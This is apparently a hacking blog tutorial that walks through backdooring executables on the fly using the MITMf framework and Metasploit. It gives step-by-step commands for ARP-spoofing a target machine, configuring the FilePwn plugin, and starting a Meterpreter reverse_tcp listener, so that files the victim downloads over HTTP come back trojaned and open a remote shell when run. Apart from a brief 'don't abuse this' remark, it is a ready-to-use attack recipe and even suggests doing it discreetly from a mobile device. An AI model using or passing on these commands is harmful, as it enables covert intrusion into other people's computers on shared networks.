Backdooring on the Fly with MITMf
Do you remember my last article on how to hook any web browser with MITMf and BeEF? Well, we are using the tool once again, but this time for auto-backdooring....
MITMf (if you don't already know) is a man in the middle attack framwork. MITMf literally stands for "Man In The Middle framework." It includes many, many different tools to help you with MitM attacks. In this case, we are automatically backdooring every downloaded executable for one specific machine. Cool, eh?
We will be ARP spoofing a Windows 8.1 VM machine in this test.
Note: This only works for HTTP sites, so you might want to use SSLstrip+ for any HTTPS sites.
You will only need MITMf and Metasploit for this attack. You can download it from either the aptitude repository (apt-get install mitmf), or through the GitHub repository (git clone https://github.com/byt3bl33d3r/MITMf).
If you choose to install via the apt, remember to run apt-get update first.
Metasploit is build-in to Kali.
Now that we have MITMf installed, we need to edit the config files to match our system. We will edit the config file located in /usr/share/mitmf/config/mitmf.cfg.
Scroll down until you get to the FilePwn section.
You can see that under the CompressedFiles section, there is a configuration for many useful payloads. Set the HOST variable to match your IP, but don't change the port. Just remember the port number for the payload you want to use.
When we run MITMf with FilePwn, we want to listen for the payload specific to the target OS. In this case, I'm targeting a Windows 8.1 machine, so I would use WindowsIntelx86. The port number for that is 8443. Remember your payload's port number for later.
We're going to be using Metasploit as our payload listener. Type use multi/handler and then set your payload. in this case, I'm using Meterpreter.
set PAYLOAD windows/meterpreter/reverse_tcp
Set the LHOST and LPORT options...
set LHOST 10.0.2.117
set LPORT 8443 (Make sure you set the corresponding port number!)
Then exploit -j. Open up a new terminal...
To run the attack, use the following command:
mitmf --spoof --arp -i <interface> --gateway <gateway IP> --target <target IP> --filepwn
For me it would be:
mitmf --spoof --arp -i wlan0 --gateway 10.0.2.1 --target 10.0.2.15 --filepwn
Pretty soon you should be getting output like this:
If a user downloads a file, and the file is patchable. you should get some output saying "File patched successfully. Sending to target." if it successfully backdoored. As soon as the victim opens the file, you should get a Meterpreter prompt.
If it doesn't say it's patched, it can't be. Unfortunately, this tactic doesn't work 100% of the time.
Now we know how to run a very neat trick--backdooring on the fly. This gets even better if you do this via mobile, as you will be very discrete. Don't abuse this power. As said in the help menu for MITMf quoting Yoda, "Use wisely, young padawan."
C|H of C3
NOTE: This had been sitting in my drafts for a month now. I've been waiting to post this for a long time.